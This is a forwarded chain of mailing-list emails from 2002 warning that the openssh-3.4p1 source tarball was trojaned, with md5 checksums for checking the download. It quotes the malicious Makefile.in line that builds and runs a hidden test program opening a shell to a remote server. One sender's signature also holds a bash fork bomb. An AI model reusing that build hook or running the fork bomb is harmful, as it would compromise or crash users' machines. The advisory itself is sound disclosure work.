FYI....from my Linux User Group maillist. --karl
>X-Authentication-Warning: quince.tricity.wsu.edu: majordomo set sender to >[EMAIL PROTECTED] using -f >Date: Thu, 1 Aug 2002 13:20:48 -0700 >From: Ed <[EMAIL PROTECTED]> >To: [EMAIL PROTECTED] >Subject: <3CLUG> !!!! [[EMAIL PROTECTED]: openssh-3.4p1.tar.gz >distribution recently trojaned] !!!! >Mail-Followup-To: [EMAIL PROTECTED] >User-Agent: Mutt/1.2.5.1i >Sender: [EMAIL PROTECTED] > > >if you didn't know this already, some copies of the source distribution >of openssh are *trojaned*! the _untrojaned_ version has this md5 sum: >459c1d0262e939d6432f193c7a4ba8a8 (use md5sum openssh-3.4p1.tar.gz to >check it). the trojan horse connects to a computer in australia and >opens a shell on the local machine. > > Ed > >----- Forwarded message from Mikael Olsson <[EMAIL PROTECTED]> ----- > >Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm >Precedence: bulk >List-Id: <bugtraq.list-id.securityfocus.com> >List-Post: <mailto:[EMAIL PROTECTED]> >List-Help: <mailto:[EMAIL PROTECTED]> >List-Unsubscribe: <mailto:[EMAIL PROTECTED]> >List-Subscribe: <mailto:[EMAIL PROTECTED]> >Delivered-To: mailing list [EMAIL PROTECTED] >Delivered-To: moderator for [EMAIL PROTECTED] >Date: Thu, 01 Aug 2002 13:20:47 +0200 >From: Mikael Olsson <[EMAIL PROTECTED]> >Organization: Clavister AB >To: [EMAIL PROTECTED] >Subject: openssh-3.4p1.tar.gz distribution recently trojaned >X-MailScanner: Found to be clean > > >From >http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security > >----- Forwarded message from Edwin Groothuis <[EMAIL PROTECTED]> ----- > >Date: Thu, 1 Aug 2002 16:55:51 +1000 >From: Edwin Groothuis <[EMAIL PROTECTED]> >To: [EMAIL PROTECTED] >Subject: openssh-3.4p1.tar.gz trojaned > >Greetings, > >Just want to inform you that the OpenSSH package op ftp.openbsd.org >(and probably all its mirrors now) it trojaned: > > ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz > >The OpenBSD people have been informed about it (via email to >[EMAIL PROTECTED] and via irc.openprojects.org/#openbsd) > > >The changed files are openssh-3.4p1/openbsd-compat/Makefile.in: > all: libopenbsd-compat.a >+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh >./bf-test.out & > >bf-test.c[1] is nothing more than a wrapper which generates a >shell-script[2] which compiles itself and tries to connect to an >server running on 203.62.158.32:6667 (web.snsonline.net). > >[1] http://www.mavetju.org/~edwin/bf-test.c >[2] http://www.mavetju.org/~edwin/bf-output.sh > >This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD >ports system: > MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8 > >This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz: > MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57 > >Edwin > >-- >Edwin Groothuis | Personal website: http://www.MavEtJu.org >[EMAIL PROTECTED] | Weblog: http://www.mavetju.org/weblog/weblog.php >bash$ :(){ :|:&};: | Interested in MUDs? http://www.FatalDimensions.org/ > >----- End forwarded message ----- To Unsubscribe: send mail to [EMAIL PROTECTED] with "unsubscribe freebsd-current" in the body of the message
